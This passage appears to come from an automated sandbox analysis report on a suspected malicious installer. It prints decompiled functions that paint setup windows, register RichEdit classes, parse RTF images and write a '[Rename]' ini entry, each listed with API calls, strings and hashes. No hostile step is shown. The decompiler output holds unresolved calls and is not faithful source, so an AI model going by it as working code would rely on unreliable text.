                                      								_v16 = _v112;
                                      								_v12 = _v108;
                                      								_v12 = _v8[0x12a];
                                      								PatBlt(_v32, _v24, _v20, _v16 - _v24, _v12 - _v20, 0xf00021);
                                      								_v116 = _v8[0x12a];
                                      							}
                                      							if(_v108 > _v8[0x12c]) {
                                      								_v24 = _v128.rcPaint;
                                      								_v20 = _v116;
                                      								_v16 = _v112;
                                      								_v12 = _v108;
                                      								_v20 = _v8[0x12c];
                                      								PatBlt(_v32, _v24, _v20, _v16 - _v24, _v12 - _v20, 0xf00021);
                                      								_v108 = _v8[0x12c];
                                      							}
                                      							if(_v128.rcPaint < _v8[0x129]) {
                                      								_v24 = _v128.rcPaint;
                                      								_v20 = _v116;
                                      								_v16 = _v112;
                                      								_v12 = _v108;
                                      								_v16 = _v8[0x129];
                                      								PatBlt(_v32, _v24, _v20, _v16 - _v24, _v12 - _v20, 0xf00021);
                                      								_v128.rcPaint = _v8[0x129];
                                      							}
                                      							if(_v112 > _v8[0x12b]) {
                                      								_v24 = _v128.rcPaint;
                                      								_v20 = _v116;
                                      								_v16 = _v112;
                                      								_v12 = _v108;
                                      								_v24 = _v8[0x12b];
                                      								PatBlt(_v32, _v24, _v20, _v16 - _v24, _v12 - _v20, 0xf00021);
                                      								_v112 = _v8[0x12b];
                                      							}
                                      							0x10000000(_v8, _v32,  &(_v128.rcPaint));
                                      							SelectObject(_v32, _v60);
                                      							EndPaint( *_v8,  &_v128);
                                      							return 0;
                                      						}
                                      						_t391 = _v8;
                                      						_t243 =  *(_t391 + 0x54) & 0x00000002;
                                      						if(( *(_t391 + 0x54) & 0x00000002) == 0) {
                                      							goto L14;
                                      						}
                                      						goto L13;
                                      					}
                                      					if(_v36 == 0x14) {
                                      						_v64 = _a12;
                                      						if(GetUpdateRect( *_v8,  &_v144, 1) != 0) {
                                      							FillRect(_v64,  &_v144, _v8[0x14]);
                                      						}
                                      						return 1;
                                      					}
                                      					goto L30;
                                      				}
                                      				if(_a8 != 0x81) {
                                      					return DefWindowProcW(_a4, _a8, _a12, _a16);
                                      				}
                                      				_v52 = _a16;
                                      				0x10000000("WM_NCCREATE: hWnd %p style 0x%08x\n", _a4,  *((intOrPtr*)(_v52 + 0x20)));
                                      				return E1000BB30(_a4, _v52, 0);
                                      			}




























                                      APIs
                                      • GetWindowLongW.USER32(?,00000000), ref: 1000BC24
                                      • DefWindowProcW.USER32(?,00000081,?,?), ref: 1000BC83
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 1000C030
                                      Strings
                                      • WM_NCCREATE: hWnd %p style 0x%08x, xrefs: 1000BC4D
                                      • exit hwnd %p msg %04x (%s) %lx %lx, unicode %d -> %lu, xrefs: 1000C05E
                                      • enter hwnd %p msg %04x (%s) %lx %lx, unicode %d, xrefs: 1000BC11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Proc$Long
                                      • String ID: WM_NCCREATE: hWnd %p style 0x%08x$enter hwnd %p msg %04x (%s) %lx %lx, unicode %d$exit hwnd %p msg %04x (%s) %lx %lx, unicode %d -> %lu
                                      • API String ID: 1311478503-452856824
                                      • Opcode ID: b418a6ad58d816df1ee0cb66856785b853f8bda1ff7a21db89125a00a35db6a2
                                      • Instruction ID: 5b0d388290c247a159ef48e4e9e6a2ec5c093b8039d0c8a722f8059391e5a455
                                      • Opcode Fuzzy Hash: b418a6ad58d816df1ee0cb66856785b853f8bda1ff7a21db89125a00a35db6a2
                                      • Instruction Fuzzy Hash: C10283B5A00209EFDB04CF98D985DEEB7B5FF88340F208259F919A7245D734AA41CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 90%
                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                      				struct tagLOGBRUSH _v16;
                                      				struct tagRECT _v32;
                                      				struct tagPAINTSTRUCT _v96;
                                      				struct HDC__* _t70;
                                      				struct HBRUSH__* _t87;
                                      				struct HFONT__* _t94;
                                      				long _t102;
                                      				intOrPtr _t115;
                                      				signed int _t126;
                                      				struct HDC__* _t128;
                                      				intOrPtr _t130;
                                      
                                      				if(_a8 == 0xf) {
                                      					_t130 =  *0x42eb70; // 0x720250
                                      					_t70 = BeginPaint(_a4,  &_v96);
                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                      					_a8 = _t70;
                                      					GetClientRect(_a4,  &_v32);
                                      					_t126 = _v32.bottom;
                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                      					while(_v32.top < _t126) {
                                      						_a12 = _t126 - _v32.top;
                                      						asm("cdq");
                                      						asm("cdq");
                                      						asm("cdq");
                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                      						_t87 = CreateBrushIndirect( &_v16);
                                      						_v32.bottom = _v32.bottom + 4;
                                      						_a16 = _t87;
                                      						FillRect(_a8,  &_v32, _t87);
                                      						DeleteObject(_a16);
                                      						_v32.top = _v32.top + 4;
                                      					}
                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                      						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                      						_a16 = _t94;
                                      						if(_t94 != 0) {
                                      							_t128 = _a8;
                                      							_v32.left = 0x10;
                                      							_v32.top = 8;
                                      							SetBkMode(_t128, 1);
                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                      							_a8 = SelectObject(_t128, _a16);
                                      							DrawTextA(_t128, "oryzytcrolozawnhxg Setup", 0xffffffff,  &_v32, 0x820);
                                      							SelectObject(_t128, _a8);
                                      							DeleteObject(_a16);
                                      						}
                                      					}
                                      					EndPaint(_a4,  &_v96);
                                      					return 0;
                                      				}
                                      				_t102 = _a16;
                                      				if(_a8 == 0x46) {
                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                      					_t115 =  *0x42eb68; // 0x3042c
                                      					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                      				}
                                      				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                      			}















                                      APIs
                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32 ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32 ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,?), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextA.USER32(00000000,oryzytcrolozawnhxg Setup,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F$oryzytcrolozawnhxg Setup
                                      • API String ID: 941294808-3389780391
                                      • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                      • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                      • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                      • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E10007190(void* __ecx) {
                                      				struct _WNDCLASSW _v44;
                                      				struct _WNDCLASSA _v84;
                                      				void* _t51;
                                      
                                      				_t51 = __ecx;
                                      				_v44.style = 0x400b;
                                      				_v44.lpfnWndProc = E1000C080;
                                      				_v44.cbClsExtra = 0;
                                      				_v44.cbWndExtra = 4;
                                      				_v44.hInstance = 0;
                                      				_v44.hIcon = 0;
                                      				_v44.hCursor = LoadCursorW(0, 0x7f01);
                                      				_v44.hbrBackground = GetStockObject(5);
                                      				_v44.lpszMenuName = 0;
                                      				if(E10007550(_t51) == 0) {
                                      					_v44.lpszClassName = "RichEdit20W";
                                      					if((RegisterClassA( &_v44) & 0x0000ffff) != 0) {
                                      						_v44.lpszClassName = "RichEdit50W";
                                      						if((RegisterClassA( &_v44) & 0x0000ffff) != 0) {
                                      							L10:
                                      							_v84.style = 0x400b;
                                      							_v84.lpfnWndProc = E1000C0D0;
                                      							_v84.cbClsExtra = 0;
                                      							_v84.cbWndExtra = 4;
                                      							_v84.hInstance = 0;
                                      							_v84.hIcon = 0;
                                      							_v84.hCursor = LoadCursorW(0, 0x7f01);
                                      							_v84.hbrBackground = GetStockObject(5);
                                      							_v84.lpszMenuName = 0;
                                      							if((RegisterClassA( &_v84) & 0x0000ffff) != 0) {
                                      								_v84.lpszClassName = "RichEdit50A";
                                      								if((RegisterClassA( &_v84) & 0x0000ffff) != 0) {
                                      									return 1;
                                      								}
                                      								return 0;
                                      							}
                                      							return 0;
                                      						}
                                      						return 0;
                                      					}
                                      					return 0;
                                      				}
                                      				if((RegisterClassW( &_v44) & 0x0000ffff) != 0) {
                                      					_v44.lpszClassName = L"RICHEDIT50W";
                                      					if((RegisterClassW( &_v44) & 0x0000ffff) != 0) {
                                      						goto L10;
                                      					}
                                      					return 0;
                                      				}
                                      				return 0;
                                      			}







                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 100071C7
                                      • GetStockObject.GDI32(00000005), ref: 100071D2
                                        • Part of subcall function 10007550: GetVersion.KERNEL32(?,?,100071E7), ref: 10007554
                                      • RegisterClassW.USER32 ref: 100071EF
                                      • RegisterClassW.USER32 ref: 1000720E
                                      • RegisterClassA.USER32 ref: 1000722F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ClassRegister$CursorLoadObjectStockVersion
                                      • String ID: RICHEDIT50W$RichEdit20W$RichEdit50A$RichEdit50W
                                      • API String ID: 4234609932-3574488814
                                      • Opcode ID: e51c89301f8e1d8d231c55b06cb383409676bcf5895e3e2bd612b3a40c628aaa
                                      • Instruction ID: 774b2370a60af337e5ddffe8abf2c0aa22eae17234ffa1ddfd864578c5e57ad0
                                      • Opcode Fuzzy Hash: e51c89301f8e1d8d231c55b06cb383409676bcf5895e3e2bd612b3a40c628aaa
                                      • Instruction Fuzzy Hash: 5B315BB0D04399EAFB10DFE4C8987AEBAF4FB04385F508419F905A6284D7B9C544CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 62%
                                      			E1000B510(void* __ecx, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				intOrPtr _v8;
                                      				void* _t25;
                                      
                                      				0x10000000("\n", __ecx);
                                      				_v8 = _a8;
                                      				if(_v8 == 0) {
                                      					if(_a12 == 0) {
                                      						UnregisterClassW(0x65, 0);
                                      						UnregisterClassW(L"RICHEDIT50W", 0);
                                      						UnregisterClassA(0x65, 0);
                                      						UnregisterClassA("RichEdit50A", 0);
                                      						if( *0x10023874 != 0) {
                                      							UnregisterClassW(L"REListBox20W", 0);
                                      						}
                                      						if( *0x10023878 != 0) {
                                      							UnregisterClassW(L"REComboBox20W", 0);
                                      						}
                                      						0x10000000();
                                      						_t25 =  *0x10023870; // 0x0
                                      						HeapDestroy(_t25);
                                      						0x10000000();
                                      					}
                                      					L13:
                                      					return 1;
                                      				}
                                      				if(_v8 == 1) {
                                      					DisableThreadLibraryCalls(_a4);
                                      					 *0x10023870 = HeapCreate(0, 0x10000, 0);
                                      					_push(_a4);
                                      					if(E10007190(_a4) != 0) {
                                      						 *0x1002387c = LoadCursorW(_a4, "1");
                                      						0x10000000();
                                      						goto L13;
                                      					}
                                      					return 0;
                                      				}
                                      				goto L13;
                                      			}






                                      APIs
                                      • DisableThreadLibraryCalls.KERNEL32(?), ref: 1000B53C
                                      • HeapCreate.KERNEL32(00000000,00010000,00000000), ref: 1000B54B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CallsCreateDisableHeapLibraryThread
                                      • String ID: REComboBox20W$REListBox20W$RICHEDIT50W$RichEdit50A
                                      • API String ID: 4256521893-2544720935
                                      • Opcode ID: 17ae2cc3a931d976a22b0e621eec5621edae63bf1e2c446208552c85438da1ee
                                      • Instruction ID: b66b16e4ad38f6a3e0a32cb2f67fc1dac48ef38ee7b6e563d5f68aea8832f2e2
                                      • Opcode Fuzzy Hash: 17ae2cc3a931d976a22b0e621eec5621edae63bf1e2c446208552c85438da1ee
                                      • Instruction Fuzzy Hash: F8215174A40714FBF710EFA0DC8EB9977E6EB05782F608014F6029A1E5DB76E990CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00405679() {
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr* _t15;
                                      				long _t16;
                                      				intOrPtr _t18;
                                      				int _t20;
                                      				void* _t28;
                                      				long _t29;
                                      				intOrPtr* _t37;
                                      				int _t43;
                                      				void* _t44;
                                      				long _t47;
                                      				CHAR* _t49;
                                      				void* _t51;
                                      				void* _t53;
                                      				intOrPtr* _t54;
                                      				void* _t55;
                                      				void* _t56;
                                      
                                      				_t15 = E00405C49(1);
                                      				_t49 =  *(_t55 + 0x18);
                                      				if(_t15 != 0) {
                                      					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                      					if(_t20 != 0) {
                                      						L16:
                                      						 *0x42ebf0 =  *0x42ebf0 + 1;
                                      						return _t20;
                                      					}
                                      				}
                                      				 *0x42c168 = 0x4c554e;
                                      				if(_t49 == 0) {
                                      					L5:
                                      					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
                                      					if(_t16 != 0 && _t16 <= 0x400) {
                                      						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
                                      						_t18 =  *0x42eb70; // 0x720250
                                      						_t56 = _t55 + 0x10;
                                      						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
                                      						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
                                      						_t53 = _t20;
                                      						 *(_t56 + 0x14) = _t53;
                                      						if(_t53 == 0xffffffff) {
                                      							goto L16;
                                      						}
                                      						_t47 = GetFileSize(_t53, 0);
                                      						_t7 = _t43 + 0xa; // 0xa
                                      						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                      						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                      							L15:
                                      							_t20 = CloseHandle(_t53);
                                      							goto L16;
                                      						} else {
                                      							if(E00405577(_t51, "[Rename]\r\n") != 0) {
                                      								_t28 = E00405577(_t26 + 0xa, 0x409328);
                                      								if(_t28 == 0) {
                                      									L13:
                                      									_t29 = _t47;
                                      									L14:
                                      									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
                                      									SetFilePointer(_t53, 0, 0, 0);
                                      									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                      									GlobalFree(_t51);
                                      									goto L15;
                                      								}
                                      								_t37 = _t28 + 1;
                                      								_t44 = _t51 + _t47;
                                      								_t54 = _t37;
                                      								if(_t37 >= _t44) {
                                      									L21:
                                      									_t53 =  *(_t56 + 0x14);
                                      									_t29 = _t37 - _t51;
                                      									goto L14;
                                      								} else {
                                      									goto L20;
                                      								}
                                      								do {
                                      									L20:
                                      									 *((char*)(_t43 + _t54)) =  *_t54;
                                      									_t54 = _t54 + 1;
                                      								} while (_t54 < _t44);
                                      								goto L21;
                                      							}
                                      							E0040592B(_t51 + _t47, "[Rename]\r\n");
                                      							_t47 = _t47 + 0xa;
                                      							goto L13;
                                      						}
                                      					}
                                      				} else {
                                      					CloseHandle(E00405602(_t49, 0, 1));
                                      					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
                                      					if(_t16 != 0 && _t16 <= 0x400) {
                                      						goto L5;
                                      					}
                                      				}
                                      				return _t16;
                                      			}























                                      APIs
                                        • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                        • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                        • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                                      • GetShortPathNameA.KERNEL32 ref: 004056CF
                                      • GetShortPathNameA.KERNEL32 ref: 004056EC
                                      • wsprintfA.USER32 ref: 0040570A
                                      • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                                      • GlobalFree.KERNEL32 ref: 004057C9
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                                        • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                        • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                      • String ID: %s=%s$[Rename]
                                      • API String ID: 3772915668-1727408572
                                      • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                      • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                      • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                      • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 24%
                                      			E10007DB0(intOrPtr* _a4) {
                                      				long _v8;
                                      				BYTE* _v12;
                                      				BITMAPINFOHEADER* _v16;
                                      				struct HENHMETAFILE__* _v20;
                                      				long _v24;
                                      				long _v28;
                                      				int _v32;
                                      				signed int _v36;
                                      				struct HBITMAP__* _v40;
                                      				struct HDC__* _v44;
                                      				long _v48;
                                      				long _v52;
                                      				struct tagMETAFILEPICT _v68;
                                      				intOrPtr* _t116;
                                      				intOrPtr _t117;
                                      				intOrPtr _t118;
                                      				intOrPtr _t119;
                                      				int _t123;
                                      				intOrPtr _t129;
                                      				intOrPtr _t132;
                                      				long _t191;
                                      				void* _t206;
                                      				void* _t207;
                                      				void* _t208;
                                      
                                      				_v12 = 0;
                                      				_v32 = 0;
                                      				_v24 = 0;
                                      				_v8 = 1;
                                      				_v68.mm = 1;
                                      				_v48 = 0;
                                      				_v52 = _v48;
                                      				while(1) {
                                      					0x10000000(_a4);
                                      					_t207 = _t206 + 4;
                                      					if( *_a4 == 2) {
                                      						if(_v8 != 1) {
                                      							0x10000000(_a4);
                                      							_t207 = _t207 + 4;
                                      						} else {
                                      							if(_v12 == 0) {
                                      								_t123 = E10007C40(_a4,  &_v12);
                                      								_t207 = _t207 + 8;
                                      								_v32 = _t123;
                                      							}
                                      						}
                                      					}
                                      					_t116 = _a4;
                                      					if( *_t116 == 4) {
                                      						return _t116;
                                      					}
                                      					0x10000000(_a4, 1, 1);
                                      					_t206 = _t207 + 0xc;
                                      					if(_t116 == 0) {
                                      						_t117 = _a4;
                                      						0x10000000(_t117, 1, 0);
                                      						_t206 = _t206 + 0xc;
                                      						if(_t117 == 0) {
                                      							0x10000000(_a4, 3, 0xd);
                                      							_t208 = _t206 + 0xc;
                                      							if(_t117 != 0) {
                                      								_t118 = _a4;
                                      								0x10000000(_t118, 0xd, 2);
                                      								_t206 = _t208 + 0xc;
                                      								if(_t118 == 0) {
                                      									_t119 = _a4;
                                      									0x10000000(_t119, 0xd, 3);
                                      									_t206 = _t206 + 0xc;
                                      									if(_t119 == 0) {
                                      										0x10000000(_a4, 0xd, 5);
                                      										_t206 = _t206 + 0xc;
                                      										if(_t119 == 0) {
                                      											0x10000000(_a4, 0xd, 9);
                                      											_t206 = _t206 + 0xc;
                                      											if(_t119 == 0) {
                                      												0x10000000(_a4, 0xd, 0xa);
                                      												_t206 = _t206 + 0xc;
                                      												if(_t119 == 0) {
                                      													0x10000000(_a4, 0xd, 0xb);
                                      													_t206 = _t206 + 0xc;
                                      													if(_t119 == 0) {
                                      														0x10000000(_a4, 0xd, 0xc);
                                      														_t206 = _t206 + 0xc;
                                      														if(_t119 == 0) {
                                      															0x10000000("Non supported attribute: %d %d %d\n",  *_a4,  *((intOrPtr*)(_a4 + 4)),  *((intOrPtr*)(_a4 + 8)));
                                      															_t206 = _t206 + 0x10;
                                      														} else {
                                      															_v48 =  *(_a4 + 0xc);
                                      														}
                                      													} else {
                                      														_v52 =  *(_a4 + 0xc);
                                      													}
                                      												} else {
                                      													_v68.yExt =  *(_a4 + 0xc);
                                      												}
                                      											} else {
                                      												_v68.xExt =  *(_a4 + 0xc);
                                      											}
                                      										} else {
                                      											_v24 = 1;
                                      										}
                                      									} else {
                                      										if( *(_a4 + 0xc) != 0) {
                                      											0x10000000("dibitmap should be 0 (%d)\n",  *(_a4 + 0xc));
                                      											_t206 = _t206 + 8;
                                      										}
                                      										_v24 = 3;
                                      									}
                                      								} else {
                                      									_v68.mm =  *(_a4 + 0xc);
                                      									_v24 = 2;
                                      								}
                                      							} else {
                                      								_t129 = _a4;
                                      								0x10000000(_t129);
                                      								0x10000000(_a4, 1, 1);
                                      								_t206 = _t208 + 0x10;
                                      								if(_t129 != 0) {
                                      									_v8 = _v8 - 1;
                                      								}
                                      							}
                                      						} else {
                                      							_v8 = _v8 + 1;
                                      						}
                                      					} else {
                                      						_t191 = _v8 - 1;
                                      						_v8 = _t191;
                                      						if(_t191 == 0) {
                                      							if(_v12 != 0) {
                                      								_v28 = _v24;
                                      								if(_v28 == 1) {
                                      									_v20 = SetEnhMetaFileBits(_v32, _v12);
                                      									if(_v20 != 0) {
                                      										E100078B0( *((intOrPtr*)(_a4 + 0x64)), _v20, 0,  &_v52);
                                      										_t206 = _t206 + 0x10;
                                      									}
                                      								} else {
                                      									if(_v28 == 2) {
                                      										_v20 = SetWinMetaFileBits(_v32, _v12, 0,  &_v68);
                                      										if(_v20 != 0) {
                                      											E100078B0( *((intOrPtr*)(_a4 + 0x64)), _v20, 0,  &_v52);
                                      											_t206 = _t206 + 0x10;
                                      										}
                                      									} else {
                                      										if(_v28 == 3) {
                                      											_v16 = _v12;
                                      											_v44 = GetDC(0);
                                      											_v36 = _v16->biClrUsed;
                                      											if(_v36 == 0 && (_v16->biBitCount & 0x0000ffff) <= 8) {
                                      												_v36 = 1 << (_v16->biBitCount & 0x0000ffff);
                                      											}
                                      											_v40 = CreateDIBitmap(_v44, _v16, 4, _v16 + 0x2c + _v36 * 4, _v16, 0);
                                      											if(_v40 != 0) {
                                      												E100078B0( *((intOrPtr*)(_a4 + 0x64)), 0, _v40,  &_v52);
                                      												_t206 = _t206 + 0x10;
                                      											}
                                      											ReleaseDC(0, _v44);
                                      										}
                                      									}
                                      								}
                                      							}
                                      							HeapFree(GetProcessHeap(), 0, _v12);
                                      							_t132 = _a4;
                                      							0x10000000(_t132);
                                      							return _t132;
                                      						}
                                      					}
                                      				}
                                      			}



























                                      0x10008006
                                      0x10008000
                                      0x10007ffa
                                      0x10008116
                                      0x1000811c
                                      0x10008120
                                      0x00000000
                                      0x10008125
                                      0x10007e58
                                      0x10007e46

                                      APIs
                                      • SetEnhMetaFileBits.GDI32(00000000,00000000), ref: 10008015
                                      • SetWinMetaFileBits.GDI32(00000000,00000000,00000000,?), ref: 10008050
                                      • GetDC.USER32(00000000), ref: 10008085
                                      • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 100080D5
                                      • ReleaseDC.USER32 ref: 10008103
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 1000810F
                                      • HeapFree.KERNEL32(00000000), ref: 10008116
                                      Strings
                                      • Non supported attribute: %d %d %d, xrefs: 10007FD4
                                      • dibitmap should be 0 (%d), xrefs: 10007F0B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: BitsFileHeapMeta$BitmapCreateFreeProcessRelease
                                      • String ID: Non supported attribute: %d %d %d$dibitmap should be 0 (%d)
                                      • API String ID: 1262374917-1228721667
                                      • Opcode ID: 550b23a5a0f649a19c41335d2c523cad38598dcba80670626bd3508c090e2007
                                      • Instruction ID: ae2495ccf047c2fd58ccb59bc1920a8c2264feff5ba1e3b60df15eb54e99f3dd
                                      • Opcode Fuzzy Hash: 550b23a5a0f649a19c41335d2c523cad38598dcba80670626bd3508c090e2007
                                      • Instruction Fuzzy Hash: B2C12FB9E00209EBEB10CF90D885FAE77B5FB48385F108159FD086B289D775EA45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 1000A7BB
